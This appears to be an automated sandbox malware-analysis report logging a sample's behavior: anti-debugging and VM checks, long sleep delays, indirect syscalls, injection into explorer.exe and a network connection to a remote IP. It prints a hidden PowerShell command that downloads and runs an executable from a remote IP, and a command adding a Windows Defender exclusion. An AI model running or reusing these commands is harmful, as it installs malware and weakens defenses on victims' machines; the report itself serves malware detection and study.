                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Tries to evade debugger and weak emulator (self modifying code)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSpecial instruction interceptor: First address: 7FF7FE650D97 instructions caused by: Self-modifying code
                            Source: C:\ProgramData\windows\windows.exeSpecial instruction interceptor: First address: 7FF7EDF10D97 instructions caused by: Self-modifying code
                            Source: C:\Windows\explorer.exeSpecial instruction interceptor: First address: 2D50D97 instructions caused by: Self-modifying code
                            Source: C:\ProgramData\windows\windows.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                            Source: C:\ProgramData\windows\windows.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                            Source: C:\ProgramData\windows\windows.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4346Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5480Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7059Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2438Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeWindow / User API: threadDelayed 8623Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7487Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1965Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1226Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1241Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1231Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1214Jump to behavior
                            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1252Jump to behavior
                            Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-4191
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4820Thread sleep count: 7059 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 2438 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5276Thread sleep count: 66 > 30Jump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5276Thread sleep time: -132066s >= -30000sJump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5696Thread sleep count: 61 > 30Jump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5696Thread sleep time: -122061s >= -30000sJump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5956Thread sleep count: 63 > 30Jump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5956Thread sleep time: -126063s >= -30000sJump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 2052Thread sleep count: 61 > 30Jump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 2052Thread sleep time: -122061s >= -30000sJump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5744Thread sleep count: 8623 > 30Jump to behavior
                            Source: C:\ProgramData\windows\windows.exe TID: 5744Thread sleep time: -17254623s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 7487 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 1965 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 7448Thread sleep count: 1226 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 7448Thread sleep time: -2453226s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 7476Thread sleep count: 1241 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 7476Thread sleep time: -2483241s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 7472Thread sleep count: 1231 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 7472Thread sleep time: -2463231s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 7452Thread sleep count: 1214 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 7452Thread sleep time: -2429214s >= -30000sJump to behavior
                            Source: C:\Windows\explorer.exe TID: 7460Thread sleep count: 1252 > 30Jump to behavior
                            Source: C:\Windows\explorer.exe TID: 7460Thread sleep time: -2505252s >= -30000sJump to behavior
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\ProgramData\windows\windows.exeLast function: Thread delayed
                            Source: C:\ProgramData\windows\windows.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: explorer.exe, 0000000C.00000003.1671478323.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1671308420.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1671584704.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2777319108.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                            Source: explorer.exe, 0000000C.00000002.2777319108.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33B
                            Source: powershell.exe, 00000000.00000002.1648729326.000002AD73328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1626903601.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, windows.exe, 00000007.00000002.2777035537.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: explorer.exe, 0000000C.00000003.1670808822.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugObjectHandleJump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 87.121.86.214 3440Jump to behavior
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQuerySystemInformation: Indirect: 0x7FF7FE6232CCJump to behavior
                            Source: C:\ProgramData\windows\windows.exeNtQueryInformationProcess: Indirect: 0x7FF7EDEEB915Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeNtQueryInformationProcess: Indirect: 0x7FF7EDEEB7BEJump to behavior
                            Source: C:\ProgramData\windows\windows.exeNtQuerySystemInformation: Indirect: 0x7FF7EDEE32CCJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQueryInformationProcess: Indirect: 0x7FF7FE62B7BEJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeNtQueryInformationProcess: Indirect: 0x7FF7FE62B915Jump to behavior
                            Maps a DLL or memory area into another process
                            Source: C:\ProgramData\windows\windows.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\ProgramData\windows\windows.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\windows\windows.exe "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}Jump to behavior
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri http://87.120.113.91/image.exe -outfile c:\users\user\appdata\local\temp\file.exe; start-process 'c:\users\user\appdata\local\temp\file.exe' }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
